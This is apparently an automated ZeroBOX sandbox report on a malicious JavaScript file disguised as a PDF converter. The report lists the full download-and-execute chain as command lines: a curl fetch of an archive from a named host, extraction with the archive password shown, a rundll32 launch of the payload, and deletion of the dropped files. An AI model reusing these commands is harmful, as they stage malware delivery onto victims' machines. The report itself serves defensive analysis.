Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 14, 2023, 1:39 p.m.	Sept. 14, 2023, 1:41 p.m.

Size	45.0KB
Type	ASCII text
MD5	`6fbc1f4557a0eef6e411c33fd88f8339`
SHA256	`5f59c1530d4f31a05e42f5f00c3054e472bb61c6c34f014415f8dbde89db77f7`
CRC32	`A18803C2`
ssdeep	`768:a8hamxyq1YAsuKZNBHUrDHTRab0hGB1Ykk:a8hayvKZNBHU/lab0U5k`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js
2544
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
  2636
- cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
  2700
- cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
  2796
  - curl.exe curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location
    2864
- curl.exe "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y"
  2936
- cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
  2508
  - animi.y "C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o"
    2656
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
  2752
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
  2824
- cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
  2912
- rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
  2964
  - rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
    1456
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
  3040

Name	Response	Post-Analysis Lookup
restohalto.site
burpeesconpan.com	A 198.57.242.58	198.57.242.58
www.7-zip.org	A 49.12.202.237	49.12.202.237

IP Address	Status	Action
164.124.101.2	Active	Moloch
198.57.242.58	Active	Moloch
49.12.202.237	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49173 49.12.202.237:443	None	None	None
TLS 1.3 192.168.56.101:49169 198.57.242.58:443	None	None	None

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 14, 2023, 1:32 p.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 14, 2023, 1:39 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 14, 2023, 1:39 p.m.	buffer: curl console_handle: 0x00000007	1	1
WriteConsoleW Sept. 14, 2023, 1:39 p.m.	buffer: https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 14, 2023, 1:40 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (6 events)

Time & API	Arguments	Status	Return
bind Sept. 14, 2023, 1:39 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Sept. 14, 2023, 1:39 p.m.	socket: 144 backlog: 1	1	0
accept Sept. 14, 2023, 1:39 p.m.	ip_address: socket: 144 port: 0	1	152
bind Sept. 14, 2023, 1:39 p.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Sept. 14, 2023, 1:39 p.m.	socket: 144 backlog: 1	1	0
accept Sept. 14, 2023, 1:39 p.m.	ip_address: socket: 144 port: 0	1	152

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 14, 2023, 1:32 p.m.	process_identifier: 1456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1	0	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\officia.p.bat

Creates a suspicious process (16 events)

cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline	cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
cmdline	"C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
cmdline	cmd.exe /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline	cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
cmdline	"C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
cmdline	cmd.exe /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\animi.y

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 14, 2023, 1:39 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:39 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:39 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:39 p.m.	show_type: 0 filepath_r: curl parameters: https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y" filepath: curl	1	1
ShellExecuteExW Sept. 14, 2023, 1:40 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c"" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:40 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\animi.y" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:40 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\saepe.o" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:40 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p" filepath: cmd.exe	1	1
ShellExecuteExW Sept. 14, 2023, 1:40 p.m.	show_type: 0 filepath_r: rundll32 parameters: "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875 filepath: rundll32	1	1
ShellExecuteExW Sept. 14, 2023, 1:40 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat" filepath: cmd.exe	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 14, 2023, 1:40 p.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2023, 1:40 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2023, 1:40 p.m.	system_name: privilege_name: SeSecurityPrivilege	1	1

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y"

Deletes executed files from disk (2 events)

file	C:\Users\test22\AppData\Local\Temp\animi.y
file	C:\Users\test22\AppData\Local\Temp\saepe.o

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\animi.y

One or more non-whitelisted processes were created (20 events)

parent_process	wscript.exe	martian_process	cmd.exe /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
parent_process	wscript.exe	martian_process	cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c" "officia.p"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process	wscript.exe	martian_process	curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c echo curl https://burpeesconpan.com/wp-content/plugins/jetpack/modules/related-posts/rtl/2575.7z --output "C:\Users\test22\AppData\Local\Temp\saepe.o" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process	wscript.exe	martian_process	"C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\animi.y"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-741.js"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""
parent_process	wscript.exe	martian_process	rundll32 "C:\Users\test22\AppData\Local\Temp\officia.p", scab /k arbalet875
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\saepe.o"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\animi.y"
parent_process	wscript.exe	martian_process	cmd.exe /c "C:\Users\test22\AppData\Local\Temp\officia.p.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\animi.y" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\saepe.o" > "C:\Users\test22\AppData\Local\Temp\officia.preprehenderit.c""

The process wscript.exe wrote an executable file to disk which it then attempted to execute (3 events)

file	C:\Windows\System32\cmd.exe
file	C:\util\curl\curl.exe
file	C:\Windows\System32\rundll32.exe

convert-pdf-741.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All